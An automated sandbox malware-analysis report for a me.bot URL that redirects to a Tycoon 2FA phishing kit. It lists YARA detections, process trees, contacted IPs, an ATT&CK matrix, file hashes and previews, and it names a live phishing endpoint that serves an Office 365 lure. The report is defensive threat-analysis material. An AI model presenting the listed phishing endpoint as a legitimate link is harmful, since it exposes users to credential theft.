Edit tour

Windows Analysis Report
https://app.me.bot/public/WQVPRYIAILRRZCLB

Overview

General Information

Sample URL:https://app.me.bot/public/WQVPRYIAILRRZCLB
Analysis ID:1642001
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:80
Range:0 - 100
Confidence:100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Program does not show much activity (idle)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 1668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,10452714066869068350,9295552649524897130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.me.bot/public/WQVPRYIAILRRZCLB" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_262JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    3.86.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      3.86.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        3.105..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          3.103.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            3.103.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
              Click to see the 20 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_262, type: DROPPED
              Source: Yara matchFile source: 3.86.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.102.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.14.pages.csv, type: HTML
              Source: Yara matchFile source: 3.86.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.102.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.14.pages.csv, type: HTML
              Source: Yara matchFile source: 3.105..script.csv, type: HTML
              Source: Yara matchFile source: 3.103.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.91..script.csv, type: HTML
              Source: Yara matchFile source: 3.85.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.10.pages.csv, type: HTML
              Source: Yara matchFile source: 3.12.pages.csv, type: HTML
              Source: Yara matchFile source: 3.14.pages.csv, type: HTML
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: Number of links: 0
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://cpg.aleonanob.ru/CqUns/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Office 365 Documentation</title> <style> body { font-family: Arial, sans-serif...
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: Title: Me.bot: Your Inspiring Companion For Life does not match URL
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: <input type="password" .../> found
              Source: https://cpg.aleonanob.ru/CqUns/HTTP Parser: No favicon
              Source: https://cpg.aleonanob.ru/CqUns/HTTP Parser: No favicon
              Source: https://cpg.aleonanob.ru/CqUns/HTTP Parser: No favicon
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="author".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="author".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="author".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="author".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="author".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="copyright".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="copyright".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="copyright".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="copyright".. found
              Source: https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252FHTTP Parser: No <meta name="copyright".. found
              Source: chromecache_369.1.drString found in binary or memory: return f}GG.K="internal.enableAutoEventOnTimer";var bc=wa(["data-gtm-yt-inspected-"]),IG=["www.youtube.com","www.youtube-nocookie.com"],JG,KG=!1; equals www.youtube.com (Youtube)
              Source: chromecache_369.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
              Source: chromecache_369.1.drString found in binary or memory: https://cct.google/taggy/agent.js
              Source: chromecache_369.1.drString found in binary or memory: https://pagead2.googlesyndication.com
              Source: chromecache_369.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
              Source: chromecache_369.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
              Source: chromecache_369.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
              Source: chromecache_369.1.drString found in binary or memory: https://td.doubleclick.net
              Source: chromecache_369.1.drString found in binary or memory: https://www.google.com
              Source: chromecache_369.1.drString found in binary or memory: https://www.googleadservices.com
              Source: chromecache_369.1.drString found in binary or memory: https://www.googletagmanager.com
              Source: chromecache_369.1.drString found in binary or memory: https://www.googletagmanager.com/a?
              Source: chromecache_369.1.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
              Source: chromecache_369.1.drString found in binary or memory: https://www.merchant-center-analytics.goog
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1668_170322749Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1668_170322749Jump to behavior
              Source: classification engineClassification label: mal80.phis.evad.win@27/316@0/41
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,10452714066869068350,9295552649524897130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.me.bot/public/WQVPRYIAILRRZCLB"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,10452714066869068350,9295552649524897130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 3.103.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.85.d.script.csv, type: HTML
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1642001 URL: https://app.me.bot/public/W... Startdate: 18/03/2025 Architecture: WINDOWS Score: 80 22 Yara detected AntiDebug via timestamp check 2->22 24 Yara detected Tycoon 2FA PaaS 2->24 26 Yara detected Obfuscation Via HangulCharacter 2->26 28 2 other signatures 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.17 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 170.106.112.191 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN Singapore 11->16 18 18.66.147.126 MIT-GATEWAYSUS United States 11->18 20 38 other IPs or domains 11->20

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://app.me.bot/public/WQVPRYIAILRRZCLB0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              https://app.me.bot/login?redirect=https%253A%252F%252Fapp.me.bot%252Ffalse
                unknown
                https://cpg.aleonanob.ru/CqUns/false
                  unknown
                  https://app.me.bot/publicfalse
                    unknown
                    https://app.me.bot/public/WQVPRYIAILRRZCLBfalse
                      unknown
                      https://app.me.bot/false
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://stats.g.doubleclick.net/g/collect?v=2&chromecache_369.1.drfalse
                          high
                          https://www.google.comchromecache_369.1.drfalse
                            high
                            https://stats.g.doubleclick.net/g/collectchromecache_369.1.drfalse
                              high
                              https://td.doubleclick.netchromecache_369.1.drfalse
                                high
                                https://cct.google/taggy/agent.jschromecache_369.1.drfalse
                                  high
                                  https://adservice.google.com/pagead/regclk?chromecache_369.1.drfalse
                                    high
                                    https://www.merchant-center-analytics.googchromecache_369.1.drfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.186.170
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.16.138
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.18.14
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.186.174
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      99.86.4.94
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      173.194.76.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      170.106.112.191
                                      unknownSingapore
                                      132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                      43.152.29.148
                                      unknownJapan4249LILLY-ASUSfalse
                                      172.67.68.118
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      13.107.246.60
                                      unknownUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      99.86.4.58
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      142.250.181.238
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      43.175.152.66
                                      unknownJapan4249LILLY-ASUSfalse
                                      104.21.95.206
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      151.101.194.137
                                      unknownUnited States
                                      54113FASTLYUSfalse
                                      104.16.6.189
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.184.227
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.186.72
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      13.107.246.76
                                      unknownUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      18.66.147.126
                                      unknownUnited States
                                      3MIT-GATEWAYSUSfalse
                                      142.250.185.67
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      172.217.16.202
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      108.138.26.27
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      172.67.148.100
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      104.18.95.41
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.186.106
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      108.138.26.118
                                      unknownUnited States
                                      16509AMAZON-02USfalse
                                      64.233.167.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.185.195
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      188.114.96.3
                                      unknownEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      142.250.186.164
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      43.152.28.43
                                      unknownJapan4249LILLY-ASUSfalse
                                      142.250.185.72
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.16.4.189
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.185.74
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      172.217.16.195
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.184.234
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      104.17.25.14
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.17
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1642001
                                      Start date and time:2025-03-18 18:10:25 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 37s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Sample URL:https://app.me.bot/public/WQVPRYIAILRRZCLB
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:14
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal80.phis.evad.win@27/316@0/41
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Skipping network analysis since amount of network traffic is too extensive
                                      • VT rate limit hit for: https://app.me.bot/public/WQVPRYIAILRRZCLB
                                      No simulations
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):79
                                      Entropy (8bit):4.403941477424042
                                      Encrypted:false
                                      SSDEEP:3:YIzKK8LLRexA8KLClX3H8//XSI:YI1oLYxk2FM//J
                                      MD5:8230ECCF989074390F935CC383BAFABD
                                      SHA1:95CD7FD09BC5D7B7C4865DAFE4B8634ADE10F4ED
                                      SHA-256:EAA1A0FFB1B0087272EC7F726239E339CB8A1CD6EC00C2E73C6E4BD47E98F4A8
                                      SHA-512:88508CB1A00D742610453B62621DCCA4B1B2F095F4D093A04007C3AF7D5F6CD89B9C7A4864B9086EC4008FEB84ADE46251C9697F56A71B1EE303DEDC94F0AF8F
                                      Malicious:false
                                      Reputation:low
                                      Preview:{"message":"Oops, something went wrong.","code":1,"subCode":"unexpected.error"}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (538), with no line terminators
                                      Category:downloaded
                                      Size (bytes):538
                                      Entropy (8bit):5.161891002639961
                                      Encrypted:false
                                      SSDEEP:12:B5HKsltZZUygwbRtVpnbLNcJR+ttVpnbLNHeA/prD3nfHVMZ:B5HKso1wfbqfyb9ewprD3vC
                                      MD5:4BE25E13971B9607FA53AB2A4296C247
                                      SHA1:73614F8839E4924FEE70AC6B601B186B9C3E8ABF
                                      SHA-256:5A30E337CCDD25D03B608452F1A6AA64C427319D8D032E66773477580F07E10A
                                      SHA-512:BD5950DF57430EB9C82F5C4C3B6A37090C8E9F89C0475AEFC28BAC86CCBE0E565AC48F42A8772BFECB18CBB3A66FD979400E387E8DFAE9F6590DD8438235568A
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/f76280e80fbc714a.css
                                      Preview:.index_fixedMenu__4wyq6{position:fixed;bottom:124px;left:28px;z-index:10;display:flex;flex-direction:column;gap:16px}.index_largeContainer__ADziO{display:flex;flex-direction:row;height:100%;background:linear-gradient(180deg,#f4e9d9,#e8dedc 30%,#ede3e3 50%,#dcd8e5 71%,#d2e4e2)}.index_largeContainer__ADziO .index_layoutContent__GAm0K{display:flex;flex:1;max-width:100%}.index_largeContainer__ADziO .index_layoutContent__GAm0K .index_outlet__jo5gi{position:relative;flex:1;overflow:auto}.index_loginModal__mlfqX{max-height:unset!important}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (26743)
                                      Category:dropped
                                      Size (bytes):39982
                                      Entropy (8bit):5.297675606072276
                                      Encrypted:false
                                      SSDEEP:384:BIaCW5CK6pV04ZiucBb5ETMZehEGVgMrRI9yTqY:GaZ5ZsW4Zi/GVXG9yTp
                                      MD5:35B13EA9769AE5D6F5CB79B0AAECA6AF
                                      SHA1:A4CC36C653736A73FB40A4F10446B66164C533A2
                                      SHA-256:AF66A9018C4DAF8D685EDB4B5F271651740C8B2783AA5098ED2768F34EBB9A4B
                                      SHA-512:670ADD5B1AC6A0BF43E6D7C206739049877DE0628F4320BF2AE0DAA5A52BAB3A3940BB593C9AD2DBDBDC1DEFC98E952283F0684B60FBD99A74BCE781600CAC8D
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" as="image" href="/default_logo.svg"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/sta
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.924771426480989
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUwVJFPXn:UrXimPwqX1/UX
                                      MD5:C9EB229EE34AFC0ABF2361B805531366
                                      SHA1:65234EECD630F705EE5A46B29CDF60B82250A203
                                      SHA-256:2C1EA2EE42C84CC769C0DAA3E511D781FC88AE53D1B90D58D73F5967F962932D
                                      SHA-512:22BC4B4BB7CC3FFA5DB2C487ADAEC40A5A30C46552A4DF2F5CE59BD41E70497EFD8A6E3FBE4EB55243ABFF1D767A1008D15AB4B8148F9B4E8762C639627B0285
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591907921211055&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__1
                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 1024 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):23835
                                      Entropy (8bit):7.42479860265329
                                      Encrypted:false
                                      SSDEEP:384:Wxq39CJXhsJLAox9D6rKcU3Jt8y7Q4X99b1ug0UwUG+zeuT7LdvGLaD8:oq392+8rzU5my79bAUxpzRdvQa4
                                      MD5:49EEDBB9725C99517C6E65C703E251A1
                                      SHA1:EDE6F1491A2A2BD30133E6F167AFC6917B3F8689
                                      SHA-256:A5C3F8CB73B7D92F9A2AC80786CA7F6698EB2B810139E465F527B9FF8EF3B95A
                                      SHA-512:03BA5441CFEA513A8B6B2E46D16C928C59B2A200CBD996971092CB1CFA7CAC86CCDFC1989E6BAB8C5E8AEC5DA072B087C1997145D804F02D08805C69C08BB4B9
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR...............+.....pHYs...........~... .IDATx...o...}'./..Z.Z".h....89.=\....M.tf.s..D.l...... w9\.@..hM?..E............&..9..i...dU@.C.....{..#Y..V..Km.#.+.wf......|^/..=K%3..R.....|........Po.y....P.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@.......@........... ....... ........................@...2..S..8.R:...v...^K.k.{^....j..o+...^[.^X..{..#:...e..`.v.......).Gw....t..;..K.... '...#..3y.~2/.SW._..|T.....d........@\....C..}..<..?I.-w.....N...J..@x.V.|Wq......m..`.+ ...Pi...B.j..........P ?............B..m.................J.......}.hy;..G....P......gW.....<.X.:_`.C.`.....J.......>.....u..0L..................L/,-Z...K.........i.....#.0:........N......>...<.X.......%..`hv.....
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (32461), with no line terminators
                                      Category:downloaded
                                      Size (bytes):32461
                                      Entropy (8bit):5.682265911783916
                                      Encrypted:false
                                      SSDEEP:768:y+JI1Oz+whN46KOl1rhMOVpY7cwGVredcEzdu1Ur:y+JI1Oz7NhMOY7cwGLEzduir
                                      MD5:4CA5073B17A78AFE109B720CE58C6D9B
                                      SHA1:2A258B5B9651073DDB5DCD264FE4A5A3C0EE89CC
                                      SHA-256:21AEE93069D75C5E531AA0CAE5A51BFC1011AF68B8406DAD8769F02F72E2F73B
                                      SHA-512:29F2EC80D518C8FA8EE7F6A3FB5D5D4B045D614E89AF33B8CADDDB6AFB4D362B207612A03784B13A46D1E958BC56E9DB33A330A3E58A525912DF9765EF07B17C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/layout-ee895e76b5808d63.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3185],{42480:function(){},62678:function(){},25819:function(){},24112:function(){},58308:function(e,t,r){Promise.resolve().then(r.t.bind(r,84080,23)),Promise.resolve().then(r.t.bind(r,29749,23)),Promise.resolve().then(r.bind(r,7383)),Promise.resolve().then(r.bind(r,10757)),Promise.resolve().then(r.bind(r,27369)),Promise.resolve().then(r.bind(r,52869)),Promise.resolve().then(r.bind(r,8493))},7383:function(e,t,r){"use strict";r.d(t,{Provider:function(){return c},t:function(){return m}});var n=r(57437),o=r(59731),a=r.n(o),i=r(2265);let _=i.createContext(null);class d{constructor(){this.callbacks={},this.data={},this.update=e=>{this.callbacks[e]&&this.callbacks[e].forEach(t=>{try{let r=this.data[e];t(r)}catch(e){t(void 0)}})}}}function s(e){let t;let{hook:r,onUpdate:n,namespace:o}=e,a=(0,i.useRef)(n),_=(0,i.useRef)(!1);try{t=r()}catch(e){console.error("plugin-model: Invoking '".concat(o||"unknown","' model failed:"),e)}return(0,i.use
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):16348702
                                      Entropy (8bit):7.96642045892782
                                      Encrypted:false
                                      SSDEEP:393216:V8e097ZlzjQ/NhYxaTEy1t2HKvPod5fIGlunrqGbRzRCfYYYL:Vn0j5jQN1TEy1+sPUmrq2zRCfYYYL
                                      MD5:2E26DFC315ABB870CBC902C88D5305B2
                                      SHA1:B8DCE1B347263C616A7DC66AB91341F555E0F468
                                      SHA-256:29B52FEB08AA933798F490A92AE6AD661CF22D2E3D2D8E29236C633D73BF9FBC
